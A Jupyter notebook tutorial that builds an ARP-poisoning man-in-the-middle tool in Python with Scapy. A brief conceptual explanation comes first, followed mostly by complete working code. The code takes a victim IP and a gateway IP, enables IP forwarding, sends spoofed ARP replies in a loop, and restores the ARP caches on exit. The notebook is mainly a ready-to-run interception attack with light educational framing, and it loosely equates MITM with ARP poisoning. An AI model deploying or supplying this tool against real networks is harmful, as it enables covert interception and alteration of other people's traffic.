# Build a Man-in-the-Middle Tool with Scapy and Python

### What is a **Man-in-the-Middle** attack? 

**Man-in-the-Middle** attack is defined by the following situation: the attacker relays and possibly alters the communication between two parties who belive they are directly communicating with each other.

**Man-in-the-Middle** = **ARP(Address Resolution Protocol) Poisoning Attack** = the attacker poisons the ARP cache of devices with the (48-bit) MAC address of their Ethernet NIC. Once the ARP cache has been successfully poisoned, each of the victim devices send all their packets to the attacker when communicating to the other device. 

In [1]:
from IPython.display import Image
from IPython.core.display import HTML 
Image(url= "mitm.png")

### The steps for Man-in-the-Middle attack:

1. Alice sends a message to Bob, which is intercepted by Mallory: **Alice "Hi Bob, it's Alice. Give me your key." →     Mallory     Bob**

2. Mallory relays this message to Bob; Bob cannot tell it is not really from Alice: **Alice     Mallory "Hi Bob, it's Alice. Give me your key." →     Bob**

3. Bob responds with his encryption key: **Alice     Mallory     ← [Bob's key] Bob**

4. Mallory replaces Bob's key with her own, and relays this to Alice, claiming that it is Bob's key: **Alice     ← [Mallory's key] Mallory     Bob**

5. Alice encrypts a message with what she believes to be Bob's key, thinking that only Bob can read it: **Alice "Meet me at the bus stop!" [encrypted with Mallory's key] →     Mallory     Bob**

6. However, because it was actually encrypted with Mallory's key, Mallory can decrypt it, read it, modify it (if desired), re-encrypt with Bob's key, and forward it to Bob: **Alice     Mallory "Meet me at the van down by the river!" [encrypted with Bob's key] →     Bob**

7. Bob thinks that this message is a secure communication from Alice.

8. Bob goes to the van down by the river and gets robbed by Mallory.

9. Alice does not know that Bob was robbed by Mallory thinking Bob is late.

10. Not seeing Bob for a while, she determines something happened to Bob.


### How to implement a Man-in-the-Middle attack

#### Step 1 - Importing modules and getting input

In [ ]:
#Scapy is the most important module. This lets us craft and send custom packets, which is what enables us to send the ARP 
#responses.

from scapy.all import *
import sys
import os
import time


#In order to make the attack we need to ask the user for an interface, victim IP address and the router IP. 
try:
    interface = raw_input("[*] Enter Desired Interface: ")
    victimIP = raw_input("[*] Enter Victim IP: ")
    gateIP = raw_input("[*] Enter Router IP: ")
except KeyboardInterrupt:
    print("\n[*] User Requested Shutdown")
    print("[*] Exiting...")
    sys.exit(1)
    
#Also, we enabled IP forwarding for the user.
print("\n[*] Enabling IP Forwarding...\n")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")

#### Step 2 - Getting the MAC addresses

In [ ]:
#In order to create the ARP responses, we need the MAC addresses of the router and of the victim.
#By creating an ARP request we can get the information needed.
#The function has a parameter, which is the IP for which we need the MAC address.
def get_mac(IP):
    conf.verb = 0
    ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1)
    for snd,rcv in ans:
        return rcv.sprintf(r"%Ether.src%")

#### Step 3 - Re-ARPing the targets

In [ ]:
#After the attack we need to re-assign the target's addresses and we are disabling the IP forwarding.
def reARP():
    print("\n[*] Restoring Targets...")
    victimMAC = get_mac(victimIP)
    gateMAC = get_mac(gateIP)
    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7)
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7)
    print("[*] Disabling IP Forwarding...")
    os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
    print("[*] Shutting Down...")
    sys.exit(1)

#### Step 4 - Trickling the targets

In [ ]:
#Using this function we are sending a single ARP reply to each of the targets telling them that we are the other 
#target, placing ourselves in between them.
def trick(gm, vm):
    send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm))
    send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm))

#### Step 5 - Putting it all together

In [ ]:
#The mimt() function is the function that puts all together. First of all we are trying to get the victim and router MAC
#addresses. If it is not possible we are closing the program, disabling the IP forwarding. It it is possible, in a while loop,
#we can start sending replies at every 1.5 seconds, untill the user gives a keyboard interrupt (CTL+C).
def mitm():
    try:
        victimMAC = get_mac(victimIP)
    except Exception:
        os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")            
        print("[!] Couldn't Find Victim MAC Address")
        print("[!] Exiting...")
        sys.exit(1)
    try:
        gateMAC = get_mac(gateIP)
    except Exception:
        os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")            
        print("[!] Couldn't Find Gateway MAC Address")
        print("[!] Exiting...")
        sys.exit(1)
    print("[*] Poisoning Targets...")       
    while 1:
        try:
            trick(gateMAC, victimMAC)
            time.sleep(1.5)
        except KeyboardInterrupt:
            reARP()
            break

#### Step 6 - Running the application

In [ ]:
mitm()

#### Step 7 - Testing the application

In [2]:
Image(url= "1.PNG")

In [3]:
Image(url= "2.PNG")

In [4]:
Image(url= "3.PNG")

In [5]:
Image(url= "4.PNG")

In [6]:
Image(url= "5.PNG")

In [7]:
Image(url= "6.PNG")

In [8]:
Image(url= "7.PNG")

In [9]:
Image(url= "8.PNG")

In [10]:
Image(url= "9.PNG")

In [11]:
Image(url= "10.PNG")

In [12]:
Image(url= "11.PNG")

### Bibliography

**ARP Poisoning Attack and Mitigationg Techniques - https://www.cisco.com/c/en/us/products/collateral/switches/catalyst-6500-series-switches/white_paper_c11_603839.html**

**Man-in-the-middle attack - https://en.wikipedia.org/wiki/Man-in-the-middle_attack**

**A Survey of Man In The Middle Attacks** - https://ieeexplore.ieee.org/document/7442758/